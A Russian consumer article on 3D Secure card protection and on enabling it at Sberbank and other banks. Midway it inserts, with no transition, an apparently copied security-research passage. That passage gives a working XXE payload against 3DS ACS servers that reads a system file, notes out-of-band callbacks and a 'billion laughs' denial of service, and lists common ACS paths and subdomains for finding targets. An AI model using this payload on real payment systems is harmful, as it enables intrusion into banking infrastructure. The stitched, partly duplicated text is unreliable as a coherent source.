3D Secure защита в Сбербанке – как подключить и отключить через интеренет

Технология 3D Secure – это гарант безопасности ваших денежных средтв на счете карты. Подробнее о технологии и как она работает расскажем в статье.

Что такое 3D secure простыми словами

Для безопасности владельцев пластиковых карт были внедрены следующие степени защиты:

  • CVV-код. Находится на оборотной стороне карты. Предназначается для подтверждения подлинности карт во время совершения покупки или снятия денег.
  • Именные карты. Такая карта отличается от неименной тем, что имеет на лицевой стороне имя и фамилию владельца. По ней злоумышленнику сложнее будет оплатить товар в торговых точках, так как продавец может потребовать предъявить паспорт.
  • Пин-коды. Такой код придумывает сам владелец во время первого использования карты. Защищает от снятия денег с карты злоумышленниками, например, если она была потеряна.
  • 3D-Secure — технология, которая повышает безопасность проведения платежей при покупках через интернет.

3D Secure – это двухфакторная аутентификация для авторизации владельца карты во время совершения платежа. Если простыми словами, то 3D Secure – это код, который приходит владельцу карты на телефон при оплате товара. Этим паролем пользователь подтверждает, что именно он и никто другой совершает платеж.

Технология основана на протоколе расширяемого языка разметки. Применяется для защиты онлайн-платежей с дебетовых и кредитных карт.

Она не защищает денежные ресурсы, лежащие на карте, как пин-код, вводимый при снятии денег с банкомата. Также технологию не следует путать с CVV-кодом на обороте карты.

Почему именно 3D

3D-Secure не означает, что оплата проводится в каком-то трехмерном пространстве. Этот термин произошел от общего сокращенного названия трех систем или доменов (англ. «3 D» – Three Domains, что переводится как «Три домена»), которые участвуют в процедуре обмена деньгами и обеспечивают защиту их перевода от владельца к продавцу. Ими являются:

  1. Домен эквайера – система продавца или банка, куда поступают деньги;
  2. Домен эмитента – система, которая выдала карту пользователю, совершающего платеж;
  3. Система, через которую проходит оплата, или домен совместимости. Он предоставляется системами Mastercard или Visa, поддерживающими технологию 3D-Secure.

Если технология подключена к карте ее держателя, то без ведома последнего провести платеж невозможно.

Видео: 3D Secure: как это работает? (схема работы и комментарии специалиста)

Как работает протокол

Работа протокола 3D Secure заключается в перенаправлении пользователя на страницу банка-эмитента, то есть банка, выпустившего карту. На этой странице пользователь должен будет ввести одноразовый код в специальное поле. Одноразовый пароль приходит по смс на номер телефона, привязанного к карте владельца.

3D-secure

Протокол будет задействован только в том случае, если услуга активирована.

Версии протокола 3D Secure

v1.0 – 2001 г -…v2.0 – 2014 г – Устарелоv2.1 – 2017 гv2.2 – 2018 г

В настоящее время большинство платежных сервисов используют версию 1.0.2 при проведении онлайн CNP-платежей, запрашивающих OTP-код.
Версия 1.0.2 была создана в 2001 году и в ней есть некоторые проблемы.

На данный момент актуальной версией является v2.2, и EMV планирует, что к концу 2020-го года она будет использоваться везде.

Image

Это основная схема, необходимая для понимания всего процесса платежа с использованием механизма 3DS.

На этом рисунке мы видим все три домена, используемые в протоколе, а также последовательность сообщений между всеми участниками платежной операции.

Как подключить 3D Secure

Функция является бесплатной. Если у пользователя данная услуга не подключена, то он ее может активировать одним из способов:

  • в офисе банка;
  • по телефону;
  • через банкомат;
  • через онлайн-банкинг.

Примеры банков, которые подключают карты к 3D Secure:

Наименование банка Подключение Стоимость подключения Ежемесячная комиссия
Сбербанк Автоматическое, при получении карты Бесплатно Нет
Тинькофф Автоматическое, при получении карты Бесплатно Нет
ВТБ 24 По заявлению владельца, через онлайн-банкинг Бесплатно Нет, взимается единоразовая плата за входящее смс с баланса телефона

Обратившись в офис местного филиала банка

Подключение этой услуги осуществляется бесплатно. Владельцу карты необходимо сделать следующее:

  • Прийти в банк с паспортом и картой.
  • Написать заявление о подключении. Форму для заполнения выдаст сотрудник.
  • Активация произойдет после совершения первого платежа.

По телефону

Подключить услугу можно по телефону, не выходя из дома. Например, для Сбербанка:

  • Отправить Слово «Полный» в смс на номер 900.
  • Дождаться сообщения с динамичным кодом (одноразовым паролем) из четырех цифр.
  • Ввести эти цифры в ответном сообщении и отправить снова на номер 900.
  • Дождаться смс с подтверждением о подключении.
  • Теперь можно безопасно оплачивать услуги и товары по интернету.

Через банкомат

Чтобы осуществить подключение через банкомат, пользователю необходимо будет позвонить в банк и узнать о том, есть ли функция 3D на у его карты. Если ответ положительный, то владелец может смело отправляться в ближайший банкомат и подключать услугу.

  • Вставить карту в банкомат именно того финансового учреждения, которое выпустило ее.
  • Кликнуть по пункту «Другие операции».
  • Найти и выбрать «3D Secure».
  • Ввести номер мобильного, привязанного к карте.

Теперь динамичные коды для оплаты посредством технологии 3D Secure будут приходить на телефон при проведении платежа.

Через онлайн-банкинг

Подключить услугу можно в личном кабинете Сбербанка или любого банка, поддерживающего технологию. Будет показано на примере Сбербанка:

1 Открыть главную страницу банка и войти в личный кабинет.

онлайн-банкинг

2 Нажать на вкладку «Карты».

Карты

3 В выпавшем меню выбрать «Подключение 3D Secure».

Подключение 3D-Secure

Как это работает?

Так как интернет-мошенничество в последние годы на пике формы, то дополнительная защита при платежах – еще одна гарантия сохранности средств как для клиента, так и для магазинов.

Начиная с 2016 года многие банки, начали массово предлагать установку бесплатной опции 3D-Secure на карточки, предназначенные для расчетов в интернете. В последнее время эта услуга уже объявляется как обязательная, поэтому подключается она в автоматическом режиме в большинстве банков.

Среди банков, уже внедривших эту опцию, такие:

  • Сбербанк;
  • ВТБ;
  • Тинькофф;
  • Почта-Банк;
  • Альфа-банк;
  • Промсвязьбанк;
  • «Открытие» и другие.

Для банка внедрение этой технологии – гарантия, что платеж проводит непосредственно держатель карты, так как код подтверждения приходит на номер телефона, зарегистрированного во время открытия карточного счета.

Что же касается магазинов, то многие интернет-площадки еще не подключили к себе на страницу эту опцию, и в теории они могут стать заложниками неприятной ситуации, когда при оплате деньги переводятся без ведома клиента, а затем он требует их возместить в полном объеме. В таком случае банк может оставить виновным магазин, и потребовать возместить ущерб, так как на сайте продавца допускается оплата без аутентификации. А в случае потери карты любой злоумышленник может провести оплату за счет чужих денег.

Раскрутим XXE

Рассмотрим следующий пример:

<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM “file:///proc/sys/kernel/hostname”>]><ThreeDSecure><Message id=“123-123-123-123-123-123″><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>

acqBIN, merID, xid, date, purchAmount и currency отражаются в PaRes. Однако во всех реализациях ACS, которые мы нашли, удалось использовать только merID. Остальные параметры проверяются на соответствие типам данных.

Еще один интересный параметр (и наиболее полезный для атаки) — это URL. Этот параметр не отражается, но и не проверяется. Поэтому его можно использовать для эксплуатации XXE.

Вернемся к нашему примеру. В одной из реализаций ACS мы обнаружили, что можем читать короткие файлы, а также получать ответ в PaRes error через параметр merID. Таким образом, используя PaReq из примера выше, мы получали следующий ответ:

<ThreeDSecure><Message id=” 123-123-123-123-123-123 “><PARes id=” 123-123-123-123-123-123 “><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>ACS server name</merID></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>

Тем не менее в большинстве случаев оставалось только использовать параметр URL для получения DNS или HTTP-запроса к нашему сервису. Другой вектор — это выполнить DOS через XXE-атаку “billion laughs” (проверялось на тестовом сервере).

Причины ошибок авторизации.

Бывают такие ситуации, когда при проведении онлайн-платежа приходит смс: «Ошибка авторизации». Существует несколько причин для получения подобного сообщения:

  • Неверный ввод пароля. Необходимо ввести повторно правильный пароль.
  • Истек срок действия одноразового пароля. В этом случае нужно запросить пароль повторно, т.к. срок действия таких паролей ограничен.

Оплата пройдет сразу, после ввода правильного пароля и одобрения банком текущей транзакции.

Карточки с 3D-Secure

Список популярных банков, поддерживающих услугу 3D Secure:

  • Сбербанк;
  • Альфа-банк;
  • ВТБ;
  • Бинбанк;
  • «Русский Стандарт»;
  • «Почта-банк»;
  • «Тинькофф»;
  • «Связной банк» с 2012 г.;
  • «Уралсиб» с 06.2013;
  • «Промсвязьбанк»;
  • «Абсолют Банк» с 10.2013;
  • МДМ с 11.2013;
  • Ренессанс-кредит с 11.2013.

ДЛЯ СПРАВКИ: Карты, выпущенные ранее 2012 года, не поддерживают 3D Secure.

Где это можно найти?

В ходе нашего исследования мы обнаружили несколько распространенных URL-адресов:

/acs/pareq/___uid___/acspage/cap?RID=14&VAA=B/way4acs/pa?id=____id____/PaReqVISA.jsp/PaReqMC.jsp/mdpayacs/pareq/acs/auth/start.do

И распространенные имена поддоменов:

acs3ds3dssecurecappaymentsecm3dsauthtestacscard

Впрочем, иногда вы можете найти и другие интересные пути.
Если вы хотите найти что-то новое, используйте proxy interceptor и записывайте процесс совершения платежей для интересующей вас платежной системы.

Артём Суровцев

@artyomsurovtsev

Люблю технологии и все, что с ними связано. Верю, что величайшие открытия человечества еще впереди!

Преимущества и недостатки системы

К преимуществам можно отнести:

  • Получение нового кода в смс при каждой покупке или оплате. Не нужно держать пароли в голове и менять их раз в месяц.
  • Простота процедуры.
  • Безопасность. Доступ к телефону есть только у владельца карты. Если же он украден, то мошеннику потребуется еще и карта.

Недостатки:

  • При плохой связи или при полном ее отсутствии смс-коды могут не прийти на телефон. О том, как решить проблему, если пользователь не дождался прихода динамичного пароля, будет рассказано в блоке «Ответы на вопросы».
  • Возможность похищения кода с компьютера. Операционные системы, через которые проводится платеж, подвержены заражению вирусами. Последние умеют анализировать коды и отправлять их злоумышленникам.

Преимущества и недостатки

Плюсы и минусы 3D-Secure

Наряду с преимуществами данной системы аутентификации у неё имеются и недостатки. К безусловным преимуществам относится достаточно высокий уровень безопасности при работе с данной технологией. Ведь любой платёж, проходящий эту систему проверки, контролируется одноразовыми паролями, приходящими на телефон клиента при каждой финансовой операции. При этом доступ к телефону есть лишь у собственника карты или людей из его близкого окружения. Конечно, мобильный телефон могут украсть, но в этом случае мошеннику понадобится также и платёжная карта клиента.

Ещё одно преимущество состоит в том, что владельцу карточки не нужно постоянно держать в памяти пароль — об этом позаботится сама система.

Данная система будет удобна для тех, кто раньше уже пользовался услугами интернет-магазинов и имеет представление о том, какие данные требуется вводить при покупке.

К сожалению, эта современная технология кроме плюсов имеет и минусы. Не секрет, что многие пользователи, недостаточно владея компьютерными навыками, не хотят связываться с сервисом онлайн-торговли. Несмотря на простоту этой процедуры, не каждый клиент хочет вникать во все нюансы и тратить дополнительное время, чтобы пройти процедуру аутентификации банковской карты. Сталкиваясь с первыми проблемами при вводе данных, многие отказываются от оформления покупки, и товар при этом так и остаётся в виртуальной корзине интернет-магазина.

Есть и ещё один минус. В настоящее время многие телефоны работают на системе Андроид, подверженной заражению разнообразными вирусами и шпионскими приложениями. Вирусы умеют анализировать поступившие данные и инициировать платёж с паролем. Чтобы избежать подобных проблем, пользователю следует установить популярную антивирусную программу, которая станет барьером на пути мошеннических операций с чужими карточками.

Читайте также: Как пользоваться Google Pay?

Лучшие кэшбэк-карты 2021

ВостОк

ВостОк

Восточный Банк

Дебетовая карта

  • до 7% кэшбэка
  • 5,5% на остаток
  • 0₽ за обслуживание

Подробнее

Opencard

Opencard

Открытие

Дебетовая карта

  • до 11% кэшбэка
  • 4% на остаток
  • 0₽ за обслуживание

Подробнее

Польза

Польза

Хоум Кредит Банк

Дебетовая карта

  • до 22% кэшбэка
  • 5% на остаток
  • 0₽ за обслуживание

Подробнее

Следите за новостями на нашем телеграм-каналеПерейти
Редакция сайта

Как избежать действий мошенников и обхода системы безопасности

Владелец карты может защитить себя от мошеннических действий следующими способами:

  • регулярно обновлять антивирусную базу и пользоваться только лицензионным антивирусом на компьютере или смартфоне, с которых проводятся платежи;
  • ничего не покупать на неизвестных или малознакомых сайтах;
  • внимательно читать текст, который пришел в смс вместе с динамичным кодом;
  • желательно установить дневной лимит на снятие денег с карты. Это обезопасит владельца от потери всей суммы в случае атаки злоумышленников;
  • и самый редкий, но все же встречающийся ход от воров электронных денег – это перевыпуск сим-карты. Поэтому, если телефон владельца перестал ловить сеть даже в тех районах, где всегда хорошо ловил ее, держателю карты нужно будет как можно быстрее обратиться в банк для блокирования счета и к своему провайдеру – для замены номера.
Рейтинг
( 1 оценка, среднее 5 из 5 )
Загрузка ...